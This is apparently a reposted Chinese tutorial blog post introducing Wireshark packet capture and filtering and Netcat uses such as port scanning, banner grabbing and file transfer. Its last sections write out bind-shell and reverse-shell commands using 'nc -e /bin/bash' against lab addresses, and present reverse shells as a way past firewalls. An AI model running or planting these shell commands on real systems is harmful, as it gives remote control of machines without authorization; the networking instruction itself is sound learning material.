• Wireshark、Netcat


    Wireshark

    Wireshark是一个网络数据包分析软件,功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据。为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发送封包。

    界面

    抓包获取

    点击捕获->设置,设置混杂模式,选中需要监听的接口,点击“开始”,开始捕获数据:

    过滤

    • 捕捉过滤器是数据经过的第一层过滤器,它用于控制捕捉数据的数量,以避免产生过大的日志文件。捕捉过滤器必须在开始捕捉前设置完毕
    • 显示过滤器是一种更为强大(复杂)的过滤器。可以在日志文件中迅速准确地找到所需要的记录,、但是不会把数据删除。如果想恢复原状,只要把过滤条件删除即可

    二者语法异同点详见:wireshark的显示过滤器和捕捉过滤器

    点击捕获->捕获过滤器,进行捕获设置(可以自己添加删除)。常用过滤包括IP过滤(如:ip.addr == x.x.x.x,ip.src == x.x.x.x,ip.dst == x.x.x.x)、协议过滤(如:HTTP、HTTPS、SMTP、ARP等)、端口过滤(如:tcp.port == 21、udp.port == 53)、组合过滤(如:ip.addr == x.x.x.x && tcp.port == 21、tcp.port== 21 or udp.port==53)。

    显示过滤器在如下所示位置:

    着色规则

    在数据包列表区域会看到不同的颜色。wireshark可以让你指定条件,把符合条件的数据包按指定的颜色显示。
    点击视图->着色规则,弹出设置颜色规则设置对话框:

    封包详细信息

    各行信息分别为

    • Frame:物理层的数据帧概况
    • Ethernet II:数据链路层以太网帧头部信息
    • Internet Protocol Version 4:互联网层IP包头部信息
    • Transmission Control Protocol:传输层T的数据段头部信息
    • Hypertext Transfer Protocol:应用层的信息

    ip统计

    点击统计->对话,就可以统计出所在数据包中所有通信IP地址,包括IPV4和IPV6。

    协议统计

    点击统计->协议分级,就可以统计出所在数据包中所含的IP协议、应用层协议:

    Follow TCP Stream

    对于TCP协议,可提取一次会话的TCP流进行分析。点击某帧TCP数据,右键选择追踪流->TCP流:

    可以看到这个窗口中的文字会有两种颜色。其中红色用于表示从源地址到目标地址的流量。最开始的红色部分是一个GET请求。蓝色部分是和红色部分相反的方向,也就是从目标地址到源地址的流量。蓝色部分的第一行是“HTTP/1.1 200 OK”,是来自服务器的一个http成功响应。

    在这个窗口中除了能够看到这些原始数据,还可以在文本间进行搜索,将其保存成一个文件、打印,或者以ASCII码、EBCDIC、十六进制或者C数组的格式去查看。

    HTTP头部分析

    对于HTTP协议,WireShark可以提取其URL地址信息。

    点击统计->HTTP->分组计数器,就可以统计出HTTP会话中请求、应答包数量:

    点击统计->HTTP->请求,就可以统计出HTTP会话中Request的域名,包括子域名:

    点击统计->HTTP->负载分配,就可以统计出HTTP会话的IP、域名分布情况,包括返回值:

    这只是Wireshark最基础的功能,用WireShark分析攻击行为才是重中之重,后期将进行深入学习,详见WireShark教程 - 黑客发现之旅

    Netcat

    netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。netcat所做的就是在两台电脑之间建立链接并返回两个数据流。

    端口扫描

    打印21到25所有开放的端口:

    可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
    -z: 告诉netcat使用0 IO,连接成功后立即关闭连接,不进行数据交换
    -v: 详细输出
    -n: 不使用DNS解析
    

    小Tips:一般如果后面是跟ip的话,就带上-n参数;跟着是域名的话,就不带-n参数。

    一旦发现开放的端口,可以使用netcat 连接服务抓取他们的banner:

    banner是一个文本,banner是一个连接的服务发送回来的文本信息。当试图鉴别漏洞或者服务的类型和版本的时候,banner信息是非常有用的。但并不是所有的服务都会发送 banner。

    聊天服务

    服务器:

    nc -l -p 20000  
    
    -l:指明netcat处于监听模式,   
    -p:指定源端口号
    

    客户机:

    nc -n 10.43.42.5 20000  
    

    netcat在服务器的20000端口启动了一个tcp服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。

    文件传输

    FTP,SCP,SMB都可以传输文件,但是只是需要临时或者一次传输文件,不值得安装配置一个软件到机器上。现有机器A 192.168.199.139,机器B 192.168.199.161,A向B传输文件:

    服务器(A):

    $nc -l -p 20000 < 1.txt
    

    客户机(B):

    $nc -n 192.168.199.139 > 1.txt
    

    在A上创建了一个服务器并且重定向netcat的输入为文件1.txt,当任何成功连接到该端口,netcat会发送1.txt的文件内容。

    同样也可以让A作为客户端,B作为服务器。

    Server B:

    nc -l -p 20000 > 1.txt  
    

    Client A:

    nc -n 192.168.199.161 20000 < 1.txt  
    

    目录传输

    如果想要发送多个文件或者整个目录,只需要使用压缩工具tar,压缩后发送压缩包。

    服务器:

    tar -cvf - ./test/ | nc -l -p 20000    创建一个tar归档包并且通过-在控制台重定向它
    

    客户机:

    nc -n 192.168.199.139 20000 | tar -xvf -
    

    正向shell

    现要在A机器上打开B机器的shell,应把A当成Client,把B当成Server,在B上监听输入的连接,等A连入后就可操作B的shell:

    服务器:

    nc -l -p 20000 -e /bin/bash 表示当连接成功时执行/bin/bash
    

    客户机:

    nc -n 192.168.199.161 20000 
    

    反向shell

    使用正向shell时,如果防火墙屏蔽了输入,只允许输出,那么这时候就是反向shell发挥作用的时候了。

    反向shell的做法是把A当成netcat的Server,把B当成netcat的Client,然后在A上用-l参数监听netcat的链接。

    服务器:

    nc -l -p 20000  
    

    客户机:

    nc -n 192.168.199.139 20000 -e /bin/bash  
    

    然后在A上执行shell命令,就可以相当于B的远程shell了:

    反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如有一个专用IP地址为192.168.199.139,使用代理服务器连接到外部网络。如果想从网络外部访问这台机器shell,那么就会用反向外壳用于这一目的。

    更多详见:Linux Netcat 命令——网络工具中的瑞士军刀

  • 相关阅读:
    日志模块
    模块介绍3
    模块介绍2
    模块介绍
    迭代器
    Python装饰器续/三元表达式/匿名函数
    Python装饰器详解
    LATEX LIAN XI
    BELLMAN 最短路算法
    B阿狸和桃子的游戏
  • 原文地址:https://www.cnblogs.com/Jspo/p/8594588.html
Copyright © 2020-2023  润新知